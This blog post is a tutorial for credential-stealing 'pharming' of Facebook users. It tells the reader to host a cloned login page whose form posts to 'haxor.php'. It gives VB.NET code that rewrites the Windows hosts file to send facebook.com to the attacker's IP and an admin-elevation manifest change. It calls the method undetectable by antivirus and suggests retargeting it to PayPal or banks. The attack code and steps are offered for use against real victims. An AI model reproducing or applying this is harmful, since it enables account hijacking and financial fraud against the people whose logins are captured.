Pharming TUT HTML + PHP + VB.NET
Hello I will teach how to make pharming of facebook.
![[Image: pharming-diagram.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vxf_Zyzr0DKj9LsaVT67ogn0_korWMSXM4h3BQCYEQrRlmze0eTSjziXleekmCtPZd5yEok7cPASIAkvrEU3G8Bc4UAC6mdD7wlp7h-i-CJDp4x2xX_G_PqXYocOAO87ITDOH2C3RQWZ7giQ=s0-d)
![[Image: 1240.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tX90bGFtn6c4sLJTQg6gryOfwaW5JH5IHcS5mjMrqu8Yp0V4c4pICTzWD8G9E52iw-uRcU3POSIRpzX2d0t29mBTBIocPzF_x7Ej_YoSxc=s0-d)
First Install xampp
http://www.apachefriends.org/en/xampp.html
Them Host this files
Index.html
http://pastebin.com/raw.php?i=32v6fFQF
You can change the index.html for paypal a bank etc
find
First Install xampp
http://www.apachefriends.org/en/xampp.html
Them Host this files
Index.html
http://pastebin.com/raw.php?i=32v6fFQF
You can change the index.html for paypal a bank etc
find
Code:
<form method="POST" action="https://www.facebook.com/login.php?login_attempt=1"Code:
<form method="POST" action="haxor.php"Login.php
http://pastebin.com/raw.php?i=61Wm85Ar
Ok lets go to codepart
To import
Code:
Imports System.IOCode:
Dim systempath As String = Environment.GetFolderPath(Environment.SpecialFolder.System)
Dim hosts As String = systempath & "\" & "drivers" & "\" & "etc" & "\\" & "hosts"
Dim writer As New StreamWriter(hosts)
writer.Write("##Hosts file edit")
writer.Write(Environment.NewLine)
writer.Write("yourip www.facebook.com")
writer.Write(Environment.NewLine)
writer.Write("yourip facebook.com")
writer.Write(Environment.NewLine)
writer.Write("yourip http://www.facebook.com/")
writer.Dispose()
Me.Close()Them on
MYPROJECT - View Windows Settings
In ths part change
Code:
<requestedExecutionLevel level="asInvoker" uiAccess="false" />for
Code:
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />This method is fud
http://vscan.novirusthanks.org/analysis/...vdC1leGU=/
Thanks
Labels: Tricks

0 Comments:
Post a Comment
Subscribe to Post Comments [Atom]
<< Home